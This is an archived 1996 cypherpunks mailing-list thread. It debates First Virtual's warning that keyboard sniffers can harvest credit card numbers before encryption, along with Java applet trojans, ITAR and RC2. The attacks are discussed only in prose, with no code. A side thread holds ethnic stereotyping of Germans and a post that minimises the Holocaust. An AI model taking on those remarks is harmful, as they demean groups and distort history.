possible to use Java to do keyboard sniffing, just like it's possible
to use it for an adventure game, or system management software, or
anything else you can imagine a general-purpose programming language
being used for.

The real question is, "can I use a Java applet in the context of a
particular Java virtual machine implementation (like, maybe, the
Netscape Navigator web browser) to do keyboard sniffing?".

The Java interpreter is only as secure as the wrapper implementation
wants it to be.  For lots of purposes, you don't need or want any more
security for a Java program than you would for a C++ program.

______c_____________________________________________________________________
Mike M Nally * Tivoli Systems * Austin TX   * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 30 Jan 1996 23:03:11 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Java Sniffer (Was: Re: FV Announces That The Sky Is Falling)
In-Reply-To: <199601300412.XAA23037@opine.cs.umass.edu>
Message-ID: <9601301358.AA14772@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Rich Graves writes:
 > Hmm. Actually, what do Java dialog prompts look like? Is there any
 > indication that they come from Java, or can they be made to look like any
 > dialog from any program, or the OS itself? I suppose this is
 > implementation-dependent. 

Yes, it's completely dependent on the AWT implementation.  (Or, of
course, on the implementation of whatever graphical library provided
by the particular Java runtime environment in question.)

The "standard" AWT that's used in the Netscape (and maybe HotJava)
web browsers decorates all windows applets create such that it's
obvious they're there.  It is designed to be impossible for the applet
itself to corrupt the AWT such that the windows don't bear that
decoration.  (Whether the design works as advertised is a question
worth asking, of course.)


______c_____________________________________________________________________
Mike M Nally * Tivoli Systems * Austin TX   * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 30 Jan 1996 23:04:02 +0800
To: bofur@alpha.c2.org
Subject: Sad state of affairs
In-Reply-To: <199601300828.AAA08526@infinity.c2.org>
Message-ID: <9601301402.AA15555@alpha>
MIME-Version: 1.0
Content-Type: text/plain



bofur@alpha.c2.org writes:
 > It's a pretty sad statement of how poorly this list is functioning when
 > the RC2 source can be publically released but people would rather
 > sling mud over glorified keystroke trappers and rant about Nazi deathcamps.
 > 
 > Our friends at the NSA must be pleased with the slow death of this group.

Oh. Ok.


YIPPPEEE!!!  HOORAY!!!  YA HOOO!!!!!  RC2 IS PUBLIC!!!!  GOD BLESS US
ALL!!!  HOORAAAAAAY!!!!  YAY!!!!!



______c_____________________________________________________________________
Mike M Nally * Tivoli Systems * Austin TX   * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 30 Jan 1996 22:07:25 +0800
To: cypherpunks@toad.com
Subject: Re: The Big Lie
In-Reply-To: <Pine.NXT.3.91.960130134605.8770D-100000@oe1>
Message-ID: <FPqiiD113w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Oliver Huf <ohuf@relay.sedat.de> writes:

> > Damn germans. I guess that they really haven't changed a hell of a lot
> > over the past few decades. No wonder that every other European race
> > (pretty much) sterotypes them.
>
> You haven'n been in Germany for a very long time, have you?
> ... or in Europe at all?

This thread has very little cryptographic relevance and has degenarated
into a full-scale ethnic flamefest.

Neither Germans nor Americans nor any other nation are inherently evil.

There are certain things that German government does which many on this
mailing list find distasteful. There are certain things that the U.S.
government does which many on this mailing list find even more distasteful.

We should seek to help those Germans who seek to circumvent the laws of
their country which we find to be unjust and unfair, just as we would
have helped the "dissidents" in the former Soviet Union or the anti-Nazi
Germans in Nazi Germany.

Disclaimer: my grandmother is reported to be German. :-)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 30 Jan 1996 21:59:04 +0800
To: nsb@nsb.fv.com
Subject: Delusional
Message-ID: <9601301325.AA17030@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


You're disagreeing that I invented safe-tcl?  You disagree that I sent
you and Ousterhout the very first message that said I want to strip out
the dangerous commands?  That I created the mailing list and then gave it
up becuase you and Rose "took over" the concept while only releasing a
safe-Tk, leaving off the embeddeable server part? Must we go to the
archives?  You're disagreeing that without enabled mail FV would probably
not have happened?

IF so, then one of us is delusional and it's not me, kiddo.

Replies to this message will be ignored.
	/r$

PS:  Sorry C-P folks.  In penance for this off-topic probably-uneeded
defense against Nathaniel's attack, I will compare the Usenet RC2
against the licensed code and tell you what I find.  -r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 30 Jan 1996 21:55:21 +0800
To: eric@remailer.net (Eric Hughes)
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <199601292324.PAA10191@largo.remailer.net>
Message-ID: <Ql3VnkqMc50eJIrCwz@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 29-Jan-96 re: FV Demonstrates Fatal F.. Eric
Hughes@remailer.net (1441)

> I'm breaking my silence in cypherpunks to respond to what must be the
> most self-serving and fatuous expression of "concern" I've seen in a
> while.

It's a pity, Eric, that before coming down off the mountain, you didn't
stop to understand the real attack we're outlining.  I expected that
even if you didn't like what we were doing, you'd take the time to
understand it rather than embarass yourself.

> To wit:  Ohmygod!  PC's don't have perfect integrity!

The fact that PC's don't have perfect integrity is only *one* of the
four known vulnerabilities -- keyboard sniffing being another -- that we
have combined into a comprehensive, devastating attack that has never
been publicly mentioned before.

> Will someone please write a filter for common email packages which
> automatically removes selected First Virtual transactions from the
> confirmation messages?  

I've already written it.  So what?  Stealing or forging a single
transaction is EASY in almost ANY commerce system ever invented.    The
flaw we've uncovered in encrypted credit cards allows a single criminal
to automate the theft of millions of card numbers.  That's a very
different story.

> Encryption isn't the issue, Nathaniel, and you know it.  

Not only do I know it, I ***SAID*** it.  It's painfully obvious that you
didn't read our announcements very carefully, so I'll excerpt the
relevant paragraph:

> Encryption has high value in protecting sensitive information while in 
> transit. We strongly believe in encryption and use PGP, as licensed 
> users, daily. But it is clear that software-based encryption cannot 
> ensure secure credit card transactions. Encryption remains an important 
> part of computer security and is very important for protecting privacy. 
> But recognition of credit card numbers at the keyboard is trivial, and 
> therein lies the fatal flaw to software-based encryption of credit cards 
> -- sensitive information can be intercepted before it ever gets 
> encrypted. 

The issue is definitely not encryption.  The issue is that credit card
numbers are self-identifying one-way payment instruments, and there's no
way to make such instruments safe to use on insecure consumer computing
platforms.  The only reason that encryption even enters the discussion
is that there are OTHER parties who are claiming that their software
encryption products make such payment instruments safe.  They don't. 
That's all we're pointing out.

> To all those Internet payment analysts out there:
>    Financial institutions are in the business of risk transfer.  If
> you don't transfer risk in some form, you're not a financial
> institution but rather a service bureau.  Managing endpoint integrity
> risk is just one of the kinds of risk an Internet payments provider
has to deal with.  

Yes.  But the BIGGEST risk that an Internet payments provider has to
deal with is the threat of large-scale, systematic, automated fraud. 
And *that* is the hole we have just blown in the
software-encryption-of-credit-card schemes, and which you clearly didn't
take the time to understand.

> First Virtual has demonstrated time and again that
> they're pretty clueless about the whole subject of risk.  

Well, I think our financial industry partners will take our "clueless"
level of risk management any day.  We have fraud and chargeback rates so
low that they're scarcely believeable, because nearly all fraud AND
dissatisfied customers are caught by the email loop and never make it
into the credit card system in the first place.  Our acquiring bank
thinks that's pretty neat, I think.  In fact, it's worth noting that
after being our acquiring bank for over a year of live operation, and
having the most inside information possible about how our system works,
First USA Bank (one of the nation's largest credit card banks) made a
large equity investment in us last month.  Do you really think they
didn't do any risk analysis? -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 30 Jan 1996 22:00:52 +0800
To: cypherpunks@toad.com
Subject: NRO Slush Fund
Message-ID: <199601301329.IAA18155@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: 
http://www.nytimes.com/yr/mo/day/front/spy-agency-money.html

   
      January 30, 1996
      
     
Spy Agency Said to Have Spare Billions


     The National Reconnaissance Office, the secret agency
     that builds spy satellites, lost track of more than $2 
billion in
     classified money last year, largely because of its own 
internal
     secrecy, intelligence officials say.

     
     In the past, congressional oversight of the reconnaissance 
office
     has been sketchy, because few members of Congress
     understood the highly technical language of spy satellites 
and some
     did not know what they were approving when they authorized 
billions
     of dollars a year in secret spending.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sasha1@netcom.com (Alexander Chislenko)
Date: Wed, 31 Jan 1996 02:50:34 +0800
To: cypherpunks@toad.com
Subject: Credit cards: No keystrokes, no capture.
Message-ID: <199601301629.IAA11284@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  What if I offer my customers a little GUI interface where they would
click numeric buttons instead of typing the numbers?
If the card number input screen changes window dimensions as well as
size and positioning of the buttons, capturing mouse movements won't
give you much either.   Or randomly generate a set of digit buttons
and let the user drag them into a 16-digit bar.

  Am I missing something here?

-----------------------------------------------------------
| Alexander Chislenko | sasha1@netcom.com | Cambridge, MA | 
| Home page:  http://www.lucifer.com/~sasha/home.html     |
-----------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 30 Jan 1996 17:06:17 +0800
To: Raph Levien <raph@c2.org>
Subject: Re: Vladimir: put up or shut up
In-Reply-To: <Pine.SUN.3.91.960129162111.27262B-100000@infinity.c2.org>
Message-ID: <Pine.BSD.3.91.960130075633.25262A-100000@usr6.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 29 Jan 1996, Raph Levien wrote:

> Most of the recent cypherpunks traffic from Vladimir has been a 
> reiteration of the position that discussing ITAR is bad because it 
> discourages cypherpunks from releasing good crypto software.
>
	Vladimir made my kill file for good reason
 
> Well, here's one cypherpunks who recently released some software, and
> futhermore did so making significant (some might say extreme) concessions
> to the ITAR rules. I made the software available only on an 
> export-restricted Web server, and asked explicitly several times for it 
> not to be exported. If my timezone math works out right, it took about 
> half an hour for it to be available on utopia. The ITAR did _nothing_ to 
> stop, or even slow down, the reease of my software.
>
	the point is: YOU did exactly as required by ITAR. you had 
    nothing to do with its export.

	the point the government is missing is the exact same point
    the Chinese government failed to understand with Tiannamen (?) square:
    the greater the power to communicate, the less government objectives
    of suppressing information are enforceable.

	once the Russians took the total clamp off the media it was all 
    over --degeneration into anarchy, albeit, obviously somewhat less than 
    idealistic or self-policed (non-utopian).

	I believe our goal is to provide tools for the protection of 
    individual liberties (Bill of Rights, etc) in the face of both the
    governments increasing police state mentality and the enormous
    increase in technology enabling the state to abuse its power to 
    retain control.

	maybe even look at our position as electronic counter-measures!
 
	I look at debating ITAR as futile --the powers that be never
    will give up power that maintains their power. Our task is to 
    help render their supposed power ineffectual.

> Why is it, then, that we still don't have usable strong crypto tools?  I'd
> say the reason is complex, much more so than could be explained by a
> simple conspiracy theory or even too much discussion of ITAR. The main
> reason is that it is very damned hard to write good crypto-enabled
> applications.  Trust me, I know. I have done the best I could with the
> software I released, but I'm still quite frustrated with its limitations,
> especially with respect to nontechnical users. 
>
	for Joe SixPack to demand crypto tools, they must be virtually
    automatic, including protecting the user from his own ignorance.

	for instance: it took me less than a few minutes to compile and 
    install MixMaster.  OK, I've been involved in this stuff for 30+
    years, but MixMaster went together without a ripple faster than most. 
    MM is a great product for unix, or text-based usage; write it in
    emacs and send it one  --painless.

	why is MM usage not universal? 1) unawareness, 2) it takes a 
    Windoz GUI product for Joe SixPack  (please do an OS/2 version
    version first as I refuse to run Billy's toys (this is NOT a topic
    for discussion).  You need the functions of MM built into all
    the real world's sexy mail programs; and maybe everyone would think
    think twice about filling dejanews.com with embarrassing files.

	meanwhile, while we wait for the ultimate GUI --how about
    hacking it into Pine?
 
> Ultimately, to create really good crypto-enabled applications, it's going 
> to take money. And there's where ITAR is most effective. If the powers 
> that be disapprove of your software, then there goes your foreign market. 
> There go your government sales. There go those "strategic alliances" with 
> the other companies in the market, because the pressure can be applied 
> transitively too. ITAR is actually only a small part of the process.
>
	for example: IBM/Notes. any large company, or startup for that
    matter can not afford to risk the government market. guess that
    follows one of my basic rules: intimidation is just another form
    communication.
 
> Still, free software has a lot of vitality left in it. It's still strong 
> at blazing new trails in software design. Where it's weak (and this is 
> what really counts now), is being usable, easy to learn, and easy to 
> install. I think if we explicitly work towards these goals, there's hope 
> for great free crypto-enabled applications. Hell, PGP came pretty close, 
> and it's saddled with all kinds of lousy design decisions.
> 
	free software really is all that remains as a weapon against 
    government intimidation. the net is virtually transparent: witness
    tcm's change in his "speedbump" sig.

	If we wish to scream about our freedoms, putting out _good_,
    free software is the opening bid, and each time the opposition 
    raises the ante (cracks a cypher methodology), raise 'em one back.
   
> But back to Vladimir: instead of whining at us about how our fear of the
> law is hurting the acievement of our goals, why don't _you_ write that
> killer crypto-app and distribute it to the world? Who's stopping you? 
> 
	well, Vladimir --do you have it or do you not?

> Raph
> 

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Schofield <John@ktb.net>
Date: Wed, 31 Jan 1996 03:02:41 +0800
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: Your "urgent" alert
Message-ID: <199601301643.IAA00891@ktb1.ktb.net>
MIME-Version: 1.0
Content-Type: text/plain


John Schofield said:
>> I will never use First Virtual.  You should be ashamed of yourself.


Nathaniel Borenstein said:
>Why?  For pointing out a devastating potential attack that the bankers
>bearing the risk were unaware of?  It would have been grossly
>irresponsible to keep it secret.

You are fear-mongering.  You point out the details of an attack that was
*NEVER* secret.  It is transparently an attempt to build First Virtual's
market share.  This "new" technique will undoubtedly steal SOME credit-card
numbers, but it can be dealt with the same way people *NOW* deal with trojan
horses and viruses.  It involves no new ideas, no new technologies, and no
new problems.

Again, you're trying to undermine your competetors and build market share
for yourself by misleading novices.  The same people who you claim are too
clueless to understand "cut and paste."  You should be ashamed of yourself.
Go steal candy from babies.

John
______________________________________________________________________________
   John Schofield -- If all else fails, try contacting me at ac086@lafn.org.
          PGP Public Key available by e-mailing PGPKEY@sprawl.ktb.net.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 31 Jan 1996 11:13:04 +0800
To: br@scndprsn.eng.sun.com (Benjamin Renaud)
Subject: Re: FL Demonstrates Fatal Flaw in Logins
In-Reply-To: <199601300603.WAA11063@springbank.Eng.Sun.COM>
Message-ID: <199601301349.IAA02865@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Benjamin Renaud writes:
> The only events a Java applet is privy to are those that are typed in
> an applet window (and only those it itself spawned).

Don't say "is privy". Say "is supposed to be privy". Doubtless bugs
will appear in java security in the future -- they've shown up in the
past.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: olbon@dynetics.com (Clay Olbon II)
Date: Tue, 30 Jan 1996 23:07:40 +0800
To: cypherpunks@toad.com
Subject: Signed posts (was Re: FV ... Fatal Flaw ...)
Message-ID: <v01540b02ad33d3833bc4@[193.239.225.200]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Amidst all of the <exon> about the "fatal flaw", Mr. Scarenstein brings up
(amazingly) an interesting point regarding signed posts that I have wondered
about for a while.

At 5:30 PM 1/29/96, Nathaniel Borenstein wrote (highly edited!):
>Do you have my key in your key ring?  I rather  doubt it.  So what good
>would it have done?
>
>Have you downloaded my key from the net?  Assume that you have.  How do
>you know it's mine?

The issue of knowing that a signed post belongs to a particular individual
has come up often.  Clearly the best approach is verifying the key in person
  Failing that, however, I have adopted a strategy of maximizing the
probablility that the key actually belongs to me.  I do this by:

        1.  Including the fingerprint and where to get the key in my
            signed post (within the pgp sig)

        2.  Putting the key in a fairly secure place (i.e. on a machine
            controlled by my employer, but where I can check the key
            periodically

        3.  Putting the same key on the keyservers

I could (and should) also place it on my web page as well.

This is not to say that someone could not impersonate me by creating a key
and placing it in all of these places, but I think it would be difficult,
and probably not worth the effort.  I am not real worried about this threat
(but heck, if someone really wants to impersonate me, I'd be flattered).

I think these measures are probably sufficient for a mailing list level of
discussion.  Any comments? (flames >/dev/null)

        Clay



- --------------------------------------------------------------------------
Clay Olbon II            | olbon@dynetics.com
Systems Engineer         | ph: (810) 589-9930 fax 9934
Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
550 Stephenson Hwy       | PGP262 public key: finger olbon@mgr.dynetics.com
Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
    "To escape the evil curse, you must quote a bible verse; thou
     shalt not ... Doooh" - Homer (Simpson, not the other one)
- --------------------------------------------------------------------------


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQ4mjwS4mEMx6xUNAQFkjgP/QYovJZzguQy4yQqWYZQPCpZn1oU8VaCr
14JW7XIk29F4xDHEPT8YlCvt7lJ6aYvWNbFVpmTWzj8IiAgWwDeQZVbQyA+YRuMs
w5kOF2brGAElln+j5hxtoIzvfy2lp+Jr8c6Q3yklCX6Yizt6G+Ma08HC1HkUZ2Jd
d0GSBZwk4nw=
=PF/1
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 30 Jan 1996 23:26:27 +0800
To: "timo@microsoft.com>
Subject: Re: FV's Borenstein discovers keystroke capture programs! (pictures at 11!)
In-Reply-To: <c=US%a=_%p=msft%l=RED-66-MSG960129190324HH007C00@red-02-imc.itg.microsoft.com>
Message-ID: <kl3Wc7OMc50eRIr810@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


>  But I just can't believe that he thinks that
the telephone is more secure on average than a keyboard.

We have a few pages of C code that scan everything you type on a
keyboard, and selects only the credit card numbers.  How easy is that to
do with credit card numbers spoken over a telephone?

The key is large-scale automated attacks, not one-time interceptions.
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 30 Jan 1996 17:48:28 +0800
To: drose@AZStarNet.com
Subject: Re: The Big Lie
In-Reply-To: <199601290354.UAA15417@web.azstarnet.com>
Message-ID: <Pine.BSD.3.91.960130085600.25262B-100000@usr6.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Jan 1996 drose@AZStarNet.com wrote:

> >stories are true that the Holocaust was part of Truman's "Big Lie."
> >
> 
> Good Lord!  We've all enjoyed Tim's rants, but this takes the biscuit.
> What's next?
> A denial of the athletic abilities of Negroes?
> 
> --Dave Rose
> 
	IMFO you opened your mouth before you clutched in your brain. 

	tim's point is presented not as an opinion, but as a supposition
    for a counter-argument. I do not read the article as "revisionist."
    IMHO, Tim's point that suppressing the truth generally places
    the "accepted" view of history into question is valid.

	of course, who the hell am I?  and I suppose I have 3 strikes
    starting out being a Schweicheriech---

	my only comment on the atrocity is that is was no larger than
    that visited upon the Armenians by the Turks, and less than 10%
    of Stalin's toll.  The fact is: they are still wrong!  Man's 
    inhumanity to man is well documented (other that what generations
    of revisionists have altered) through history.  And, he who fails
    to read history, is doomed to repeat it....

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul M. Cardon" <pmarc@fnbc.com>
Date: Wed, 31 Jan 1996 01:46:52 +0800
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <199601292324.PAA10191@largo.remailer.net>
Message-ID: <199601301529.JAA06833@abraxas.fnbc.com>
MIME-Version: 1.0
Content-Type: text/plain


My mailer insists that Nathaniel Borenstein wrote:
> Excerpts from mail: 29-Jan-96 re: FV Demonstrates Fatal F.. Eric
> Hughes@remailer.net (1441)
> > First Virtual has demonstrated time and again that they're pretty
> > clueless about the whole subject of risk.
>
> Well, I think our financial industry partners will take our
> "clueless" level of risk management any day.

Glad we're not a partner.

---
Paul M. Cardon
System Officer - Capital Markets Systems
First Chicago NBD Corporation

MD5 (/dev/null) = d41d8cd98f00b204e9800998ecf8427e




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andreas@horten.artcom.de (Andreas Bogk)
Date: Wed, 31 Jan 1996 18:16:33 +0800
To: cypherpunks@toad.com
Subject: Re: Opinion piece in NYT; responses needed
In-Reply-To: <spgyrt1a@totally-fudged-out-message-id>
Message-ID: <y8aohrmxevr.fsf@horten.artcom.de>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Rich" == Rich Graves <llurch@networking.stanford.edu> writes:

    Rich> Is DT going to block TCP port 80 and UDP ports 7000-7029
    Rich> from every machine in the world?

We'll see. I told the Admin of dfn.de nicely that his routing seems to
be broken. If he responds with pointing to the Zuendel site, I'll send
him the other URLs and ask him to stop routing to these sites as well.

Andreas

P.S.: I need some fodder. Anyone else mirroring the site?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMQ3XXUyjTSyISdw9AQEvgQP+MyHBlF7JmcIBHEceFCxECnyMbuPHBnPa
MvoHGdLZwIxWmEpa8YwTHb06mQ5J3oO2AiWNWLgw480krWGV10R8bhMIOBP51Htz
7Odl6S1S1NLtxE/yyzkSH4D4AukFT4BrMviPWVDGnArGwS8XioTyyxhYC4JKyjfu
ahrCdu9nha8=
=SWyn
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 30 Jan 1996 23:45:13 +0800
To: pmarc@fnbc.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit
In-Reply-To: <9601292111.AA23738@toad.com>
Message-ID: <gl3WkoKMc50e1Ir_08@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 29-Jan-96 Re: FV Demonstrates Fatal F.. "Paul M.
Cardon"@fnbc.co (986*)

> Any useful information in your anouncement is already well-known.   
> The rest of it is alarmist and self-serving.  There have been  
> several excellent posts pointing out the flaws in your arguments.

No, they've pointed out flaws in the claim that FV has just invented
keyboard sniffers.  That's not our argument at all, it's a strawman.

> Until I actually see an advisory from CERT, I'll just have to  
> assume they told FV to go take a flying leap.  I certainly hope they  
> have enough integrity to ignore this.

I would never speak for the people at CERT, but if they had told us the
threat wasn't real, we certainly wouldn't be claiming that it was.  We
went to CERT first for two reasons:  to be responsible with the new
threat we had uncovered, and to do a sanity check on its importance.

Having said that, I'm quite sure that you won't see a CERT advisory,
because we haven't released the program, it doesn't threaten anyone, and
there aren't any patches you can download to fix the problem.  It's not
something within their mandate to issue advisories about.  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Tue, 30 Jan 1996 23:42:02 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Java Sniffer (Was: Re: FV Announces That The Sky Is Falling)
In-Reply-To: <199601300412.XAA23037@opine.cs.umass.edu>
Message-ID: <9601300936.ZM1868@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Jan 29, 11:12pm, Futplex wrote:
> Much more likely, IMHO, than a Java sniffer is a Java Trojan horse that pops
> up an innocuous dialog box and asks you to enter some sensitive piece of
> information, then sends it off somewhere. About all it takes to write that is
> a modicum of skill in user interface design. You could write it in any
> programming language, but in Java it may be particularly effective, since
> people may come to expect to be prompted for sensitive info over the net by
> Java apps. Maybe the Java folks who just left Sun decided to seize the
> opportunity ;>
Since the Java stuff that I'm running around here either (a) is from
netscape, which jams a little line saying, "Untrusted Java Applet" at the
bottom of each window a Java applet creates or (b) is run by me, by hand,
from the command line, using either the interpreter or the appletviewer...
I don't think this is much of a threat. I see much more difficulties with
javascript.

richard
- --
Richard Martin
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQ4syB1gtCYLvIJ1AQGjGAP9GpTWkaY4wtknB2C/emCJ++5ZFmm4s/DV
CPbhOhSiOIQWhDCZuhGqE3ltK1xnDqz2TqnoF8xzGRSiXTVJewsTW+fzsmq0wBJ9
GbqWiA1aWatju02zxL4QWJUBxK9LSEKnmQfWlodRIySUdIhQb35Wm8wzqqGUdm9o
FS3TXrIsbNQ=
=b64Y
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul M. Cardon" <pmarc@fnbc.com>
Date: Wed, 31 Jan 1996 02:13:48 +0800
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit
In-Reply-To: <9601292111.AA23738@toad.com>
Message-ID: <199601301536.JAA06848@abraxas.fnbc.com>
MIME-Version: 1.0
Content-Type: text/plain


Interesting address that was used to reach me.

To: pmarc@nsb.fv.com
To: pmarc

Somehow, both reached me from within their system, but if they  
can't configure their e-mail to show the proper address than I don't  
have to much faith in their other abilities.  I don't imagine that  
anybody else would have much luck replying to either of those or CAN  
I now receive mail at nsb.fv.com?  Is this a new free service  
provided by FV?

---
Paul M. Cardon
System Officer - Capital Markets Systems
First Chicago NBD Corporation

MD5 (/dev/null) = d41d8cd98f00b204e9800998ecf8427e




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 30 Jan 1996 23:54:29 +0800
To: Alexandra Griffin <acg@mandrake.cen.ufl.edu>
Subject: Re: PPP link encryption?
In-Reply-To: <199601301136.GAA02305@mandrake.cen.ufl.edu>
Message-ID: <199601301438.JAA02927@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Alexandra Griffin writes:
> Is there any software out there on the net for doing real-time,
> transparent encryption of a PPP link?

Well, there is software for encrypting IP datagrams. There may be PPP
encryption out there, since there is now an IETF protocol for doing
link encryption for PPP, but I don't follow PPP very closely.

> Also, if this link is running at 600kbit/s to 1Mbit/s, how much
> processing power would be required to keep up (assuming we're using,
> say, the IDEA cipher)?  Would a dedicated 386DX/33-based router on
> each end be sufficient?

I suspect not, but on the other hand hardware to do this sort of thing
is available. The TIS people packaged up swIPe with a 3DES board for
some applications a while back, just as an example of concept.

> Finally, could someone make a ballpark estimate as to the amount of
> additional latency that would be added?

Hard to say. Depends on the implementation, your link characteristics,
etc.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 31 Jan 1996 02:29:00 +0800
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: Java Sniffer (Was: Re: FV Announces That The Sky Is Falling)
In-Reply-To: <9601301358.AA14772@alpha>
Message-ID: <9601301545.AA07088@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Jon Lasser writes:
 > But the fact that Java windows are obvious doesn't seem to really speak 
 > to the question of can they be faked from *outside* Java.

If you need to worry about something showing up on your machine that's
capable of creating fake input dialogs on your screen, I claim you
have some serious problems.

 > In fact, very distinctive windows for Java are likely to increase the 
 > success of an attack which duplicates the window decorations perfectly, 
 > because people will be used to it.

But if by being used to such windows people understand that they're
not necessarily to be trusted, I don't see why that'd be an attractive
way of slipping in a trojan horse.  I mean, if you want to give
somebody a trojan horse, you don't hang a sign around its neck reading
"I am a trojan horse".

______c_____________________________________________________________________
Mike M Nally * Tivoli Systems * Austin TX   * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Neal" <dneal@electrotex.com>
Date: Wed, 31 Jan 1996 02:30:41 +0800
To: "Joseph M. Reagle Jr." <cypherpunks@toad.com
Subject: Re: Security First Network Bank, FSB. The World's 1st Internet
Message-ID: <199601301554.JAA21481@etex.electrotex.com>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Thu, 25 Jan 1996 17:50:16 -0500
